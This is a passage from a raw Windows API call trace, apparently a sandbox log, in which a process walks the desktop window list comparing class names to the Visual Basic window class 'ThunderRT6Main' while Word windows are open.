(lpString1="AUTHUI.DLL: Shutdown Choices Message Window", lpString2="ThunderRT6Main") returned -1 [0089.287] GetWindowThreadProcessId (in: hWnd=0x2008c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.287] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0089.287] GetClassNameA (in: hWnd=0x2008e, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="_SearchEditBoxFakeWindow") returned 24 [0089.287] lstrcmpA (lpString1="_SearchEditBoxFakeWindow", lpString2="ThunderRT6Main") returned -1 [0089.287] GetWindowThreadProcessId (in: hWnd=0x2008e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.287] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0089.287] GetClassNameA (in: hWnd=0x20092, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.287] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.287] GetWindowThreadProcessId (in: hWnd=0x20092, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.287] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0089.287] GetClassNameA (in: hWnd=0x2009a, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.287] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.287] GetWindowThreadProcessId (in: hWnd=0x2009a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.287] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0089.287] GetClassNameA (in: hWnd=0x300a8, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.287] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.287] GetWindowThreadProcessId (in: hWnd=0x300a8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.287] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0089.287] GetClassNameA (in: hWnd=0x20080, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="DV2ControlHost") returned 14 [0089.287] lstrcmpA (lpString1="DV2ControlHost", lpString2="ThunderRT6Main") returned -1 [0089.287] GetWindowThreadProcessId (in: hWnd=0x20080, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.287] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f6 [0089.287] GetClassNameA (in: hWnd=0x100f6, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0089.287] lstrcmpA (lpString1="TASKENGINEWINDOWCLASS", lpString2="ThunderRT6Main") returned -1 [0089.288] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x228 [0089.288] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0089.288] GetClassNameA (in: hWnd=0x100f8, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.288] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.288] GetWindowThreadProcessId (in: hWnd=0x100f8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x228 [0089.288] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x100f0 [0089.288] GetClassNameA (in: hWnd=0x100f0, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="#43") returned 3 [0089.288] lstrcmpA (lpString1="#43", lpString2="ThunderRT6Main") returned -1 [0089.288] GetWindowThreadProcessId (in: hWnd=0x100f0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x294 [0089.288] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0089.288] GetClassNameA (in: hWnd=0x100f2, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.288] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.288] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x294 [0089.288] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100e8 [0089.288] GetClassNameA (in: hWnd=0x100e8, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0089.288] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0089.288] GetWindowThreadProcessId (in: hWnd=0x100e8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7c4 [0089.288] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e2 [0089.288] GetClassNameA (in: hWnd=0x100e2, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0089.288] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0089.288] GetWindowThreadProcessId (in: hWnd=0x100e2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x61c [0089.288] GetWindow (hWnd=0x100e2, uCmd=0x2) returned 0x100da [0089.288] GetClassNameA (in: hWnd=0x100da, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0089.288] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0089.288] GetWindowThreadProcessId (in: hWnd=0x100da, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x764 [0089.288] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0089.288] GetClassNameA (in: hWnd=0x50076, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="DV2ControlHost") returned 14 [0089.288] lstrcmpA (lpString1="DV2ControlHost", lpString2="ThunderRT6Main") returned -1 [0089.288] GetWindowThreadProcessId (in: hWnd=0x50076, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.288] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0089.288] GetClassNameA (in: hWnd=0x1006c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0089.288] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0089.288] GetWindowThreadProcessId (in: hWnd=0x1006c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x730 [0089.288] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0089.288] GetClassNameA (in: hWnd=0x1006a, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0089.288] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0089.288] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.288] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0089.288] GetClassNameA (in: hWnd=0x10062, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.288] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.288] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.288] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0089.288] GetClassNameA (in: hWnd=0x10050, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.288] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.288] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.288] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x10100 [0089.288] GetClassNameA (in: hWnd=0x10100, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0089.288] lstrcmpA (lpString1="TASKENGINEWINDOWCLASS", lpString2="ThunderRT6Main") returned -1 [0089.288] GetWindowThreadProcessId (in: hWnd=0x10100, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x404 [0089.288] GetWindow (hWnd=0x10100, uCmd=0x2) returned 0x10102 [0089.288] GetClassNameA (in: hWnd=0x10102, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.288] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.288] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x404 [0089.288] GetWindow (hWnd=0x10102, uCmd=0x2) returned 0x1004c [0089.289] GetClassNameA (in: hWnd=0x1004c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0089.289] lstrcmpA (lpString1="NotifyIconOverflowWindow", lpString2="ThunderRT6Main") returned -1 [0089.289] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.289] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0089.289] GetClassNameA (in: hWnd=0x10038, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="OleDdeWndClass") returned 14 [0089.289] lstrcmpA (lpString1="OleDdeWndClass", lpString2="ThunderRT6Main") returned -1 [0089.289] GetWindowThreadProcessId (in: hWnd=0x10038, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.289] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0089.289] GetClassNameA (in: hWnd=0x10030, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="DDEMLEvent") returned 10 [0089.289] lstrcmpA (lpString1="DDEMLEvent", lpString2="ThunderRT6Main") returned -1 [0089.289] GetWindowThreadProcessId (in: hWnd=0x10030, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x61c [0089.289] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0089.289] GetClassNameA (in: hWnd=0x2002c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="DDEMLMom") returned 8 [0089.289] lstrcmpA (lpString1="DDEMLMom", lpString2="ThunderRT6Main") returned -1 [0089.289] GetWindowThreadProcessId (in: hWnd=0x2002c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x61c [0089.289] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x20026 [0089.289] GetClassNameA (in: hWnd=0x20026, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0089.289] lstrcmpA (lpString1="COMTASKSWINDOWCLASS", lpString2="ThunderRT6Main") returned -1 [0089.289] GetWindowThreadProcessId (in: hWnd=0x20026, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x5a4 [0089.289] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0089.289] GetClassNameA (in: hWnd=0x1002a, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Dwm") returned 3 [0089.289] lstrcmpA (lpString1="Dwm", lpString2="ThunderRT6Main") returned -1 [0089.289] GetWindowThreadProcessId (in: hWnd=0x1002a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x610 [0089.289] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0089.289] GetClassNameA (in: hWnd=0x20028, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.289] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.289] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x5a4 [0089.289] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0089.289] GetClassNameA (in: hWnd=0x100ee, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.289] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.289] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x148 [0089.289] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0089.289] GetClassNameA (in: hWnd=0x100ec, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="CicLoaderWndClass") returned 17 [0089.289] lstrcmpA (lpString1="CicLoaderWndClass", lpString2="ThunderRT6Main") returned -1 [0089.289] GetWindowThreadProcessId (in: hWnd=0x100ec, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x148 [0089.289] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x401ea [0089.289] GetClassNameA (in: hWnd=0x401ea, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0089.289] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0089.289] GetWindowThreadProcessId (in: hWnd=0x401ea, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x61c [0089.289] GetWindow (hWnd=0x401ea, uCmd=0x2) returned 0x100ca [0089.289] GetClassNameA (in: hWnd=0x100ca, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Progman") returned 7 [0089.289] lstrcmpA (lpString1="Progman", lpString2="ThunderRT6Main") returned -1 [0089.289] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x61c [0089.289] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0089.289] CRetailMalloc_Alloc () returned 0x55548f0 [0089.289] CRetailMalloc_Free () returned 0x8e40201 [0089.505] GetCurrentThreadId () returned 0x9c8 [0089.505] GetWindowLongA (hWnd=0x0, nIndex=-16) returned 0 [0089.505] GetDesktopWindow () returned 0x10010 [0089.505] GetWindow (hWnd=0x10010, uCmd=0x5) returned 0x1005e [0089.505] GetClassNameA (in: hWnd=0x1005e, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.505] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.505] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.505] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0089.505] GetClassNameA (in: hWnd=0x1005c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.505] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.505] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.505] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0089.505] GetClassNameA (in: hWnd=0x10048, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.505] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.505] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.505] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0089.505] GetClassNameA (in: hWnd=0x10072, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.505] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.505] GetWindowThreadProcessId (in: hWnd=0x10072, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.505] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0089.505] GetClassNameA (in: hWnd=0x10066, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.506] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.506] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.506] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0089.506] GetClassNameA (in: hWnd=0x10064, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.506] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.506] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.506] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0089.506] GetClassNameA (in: hWnd=0x10060, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.506] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.506] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.506] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x10040 [0089.506] GetClassNameA (in: hWnd=0x10040, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Button") returned 6 [0089.506] lstrcmpA (lpString1="Button", lpString2="ThunderRT6Main") returned -1 [0089.506] GetWindowThreadProcessId (in: hWnd=0x10040, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.506] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003e [0089.506] GetClassNameA (in: hWnd=0x1003e, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="MSCTFIME UI") returned 11 [0089.506] lstrcmpA (lpString1="MSCTFIME UI", lpString2="ThunderRT6Main") returned -1 [0089.506] GetWindowThreadProcessId (in: hWnd=0x1003e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.506] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0089.506] GetClassNameA (in: hWnd=0x1003a, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.506] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.506] GetWindowThreadProcessId (in: hWnd=0x1003a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.506] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x1003c [0089.506] GetClassNameA (in: hWnd=0x1003c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Shell_TrayWnd") returned 13 [0089.506] lstrcmpA (lpString1="Shell_TrayWnd", lpString2="ThunderRT6Main") returned -1 [0089.506] GetWindowThreadProcessId (in: hWnd=0x1003c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.506] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x10118 [0089.506] GetClassNameA (in: hWnd=0x10118, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="ATL:72DF8158") returned 12 [0089.506] lstrcmpA (lpString1="ATL:72DF8158", lpString2="ThunderRT6Main") returned -1 [0089.506] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x630 [0089.506] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0089.506] GetClassNameA (in: hWnd=0x10112, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.506] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.506] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4f8 [0089.506] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0089.506] GetClassNameA (in: hWnd=0x10110, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="TaskSwitcherWnd") returned 15 [0089.506] lstrcmpA (lpString1="TaskSwitcherWnd", lpString2="ThunderRT6Main") returned -1 [0089.506] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4f8 [0089.506] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0089.506] GetClassNameA (in: hWnd=0x200aa, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.506] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.507] GetWindowThreadProcessId (in: hWnd=0x200aa, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.507] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0089.507] GetClassNameA (in: hWnd=0x200c6, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.507] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.507] GetWindowThreadProcessId (in: hWnd=0x200c6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.507] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0089.507] GetClassNameA (in: hWnd=0x200d6, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.507] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.507] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.507] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0089.507] GetClassNameA (in: hWnd=0x200c4, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Desktop User Picture") returned 20 [0089.507] lstrcmpA (lpString1="Desktop User Picture", lpString2="ThunderRT6Main") returned -1 [0089.507] GetWindowThreadProcessId (in: hWnd=0x200c4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.507] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x100d2 [0089.507] GetClassNameA (in: hWnd=0x100d2, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.507] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.507] GetWindowThreadProcessId (in: hWnd=0x100d2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x61c [0089.507] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0089.507] GetClassNameA (in: hWnd=0x5007c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.507] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.507] GetWindowThreadProcessId (in: hWnd=0x5007c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.507] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0089.507] GetClassNameA (in: hWnd=0x10074, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0089.507] lstrcmpA (lpString1="TaskListThumbnailWnd", lpString2="ThunderRT6Main") returned -1 [0089.507] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.507] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x101e4 [0089.507] GetClassNameA (in: hWnd=0x101e4, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="MSCTFIME UI") returned 11 [0089.507] lstrcmpA (lpString1="MSCTFIME UI", lpString2="ThunderRT6Main") returned -1 [0089.507] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c8 [0089.507] GetWindowLongA (hWnd=0x101e4, nIndex=-16) returned -1946157056 [0089.507] GetWindowLongA (hWnd=0x101e4, nIndex=-6) returned 0 [0089.507] GetWindowLongA (hWnd=0x101e4, nIndex=-6) returned 0 [0089.507] GetWindow (hWnd=0x101e4, uCmd=0x2) returned 0x201a4 [0089.507] GetClassNameA (in: hWnd=0x201a4, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.507] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.507] GetWindowThreadProcessId (in: hWnd=0x201a4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c8 [0089.507] GetWindowLongA (hWnd=0x201a4, nIndex=-16) returned -1946157056 [0089.507] GetWindowLongA (hWnd=0x201a4, nIndex=-6) returned 12648448 [0089.507] GetWindowLongA (hWnd=0x201a4, nIndex=-6) returned 12648448 [0089.507] GetWindow (hWnd=0x201a4, uCmd=0x2) returned 0x101b8 [0089.507] GetClassNameA (in: hWnd=0x101b8, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="OpusApp") returned 7 [0089.507] lstrcmpA (lpString1="OpusApp", lpString2="ThunderRT6Main") returned -1 [0089.508] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c8 [0089.508] GetWindowLongA (hWnd=0x101b8, nIndex=-16) returned 919535616 [0089.508] GetWindowLongA (hWnd=0x101b8, nIndex=-6) returned 1785659392 [0089.508] GetWindowLongA (hWnd=0x101b8, nIndex=-6) returned 1785659392 [0089.508] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x100e6 [0089.508] GetClassNameA (in: hWnd=0x100e6, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="MSCTFIME UI") returned 11 [0089.508] lstrcmpA (lpString1="MSCTFIME UI", lpString2="ThunderRT6Main") returned -1 [0089.508] GetWindowThreadProcessId (in: hWnd=0x100e6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x61c [0089.508] GetWindow (hWnd=0x100e6, uCmd=0x2) returned 0x1002e [0089.508] GetClassNameA (in: hWnd=0x1002e, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.508] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.508] GetWindowThreadProcessId (in: hWnd=0x1002e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x61c [0089.508] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x101f6 [0089.508] GetClassNameA (in: hWnd=0x101f6, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="OpusApp") returned 7 [0089.508] lstrcmpA (lpString1="OpusApp", lpString2="ThunderRT6Main") returned -1 [0089.508] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c8 [0089.508] GetWindowLongA (hWnd=0x101f6, nIndex=-16) returned 131006464 [0089.508] GetWindowLongA (hWnd=0x101f6, nIndex=-6) returned 1785659392 [0089.508] GetWindowLongA (hWnd=0x101f6, nIndex=-6) returned 1785659392 [0089.508] GetWindow (hWnd=0x101f6, uCmd=0x2) returned 0x201d4 [0089.508] GetClassNameA (in: hWnd=0x201d4, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="ThunderMain") returned 11 [0089.508] lstrcmpA (lpString1="ThunderMain", lpString2="ThunderRT6Main") returned -1 [0089.508] GetWindowThreadProcessId (in: hWnd=0x201d4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c8 [0089.508] GetWindowLongA (hWnd=0x201d4, nIndex=-16) returned -1946157056 [0089.508] GetWindowLongA (hWnd=0x201d4, nIndex=-6) returned 1913454592 [0089.508] IsWindowEnabled (hWnd=0x201d4) returned 0 [0089.508] GetPropA (hWnd=0x201d4, lpString=0xc13c) returned 0x1 [0089.508] RemovePropA (hWnd=0x201d4, lpString=0xc13c) returned 0x1 [0089.508] EnableWindow (hWnd=0x201d4, bEnable=1) returned 1 [0089.508] DefWindowProcA (hWnd=0x201d4, Msg=0xa, wParam=0x1, lParam=0x0) returned 0x0 [0089.508] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x30106 [0089.508] GetClassNameA (in: hWnd=0x30106, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="OleDdeWndClass") returned 14 [0089.508] lstrcmpA (lpString1="OleDdeWndClass", lpString2="ThunderRT6Main") returned -1 [0089.508] GetWindowThreadProcessId (in: hWnd=0x30106, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c8 [0089.508] GetWindowLongA (hWnd=0x30106, nIndex=-16) returned -2080374784 [0089.508] GetWindowLongA (hWnd=0x30106, nIndex=-6) returned 1997799424 [0089.508] GetWindowLongA (hWnd=0x30106, nIndex=-6) returned 1997799424 [0089.508] GetWindow (hWnd=0x30106, uCmd=0x2) returned 0x201d6 [0089.508] GetClassNameA (in: hWnd=0x201d6, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="MsoStdCompMgr") returned 13 [0089.509] lstrcmpA (lpString1="MsoStdCompMgr", lpString2="ThunderRT6Main") returned -1 [0089.509] GetWindowThreadProcessId (in: hWnd=0x201d6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c8 [0089.509] GetWindowLongA (hWnd=0x201d6, nIndex=-16) returned -2080374784 [0089.509] GetWindowLongA (hWnd=0x201d6, nIndex=-6) returned 1759510528 [0089.509] GetWindowLongA (hWnd=0x201d6, nIndex=-6) returned 1759510528 [0089.509] GetWindow (hWnd=0x201d6, uCmd=0x2) returned 0x101ca [0089.509] GetClassNameA (in: hWnd=0x101ca, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="OfficePowerManagerWindow") returned 24 [0089.509] lstrcmpA (lpString1="OfficePowerManagerWindow", lpString2="ThunderRT6Main") returned -1 [0089.509] GetWindowThreadProcessId (in: hWnd=0x101ca, 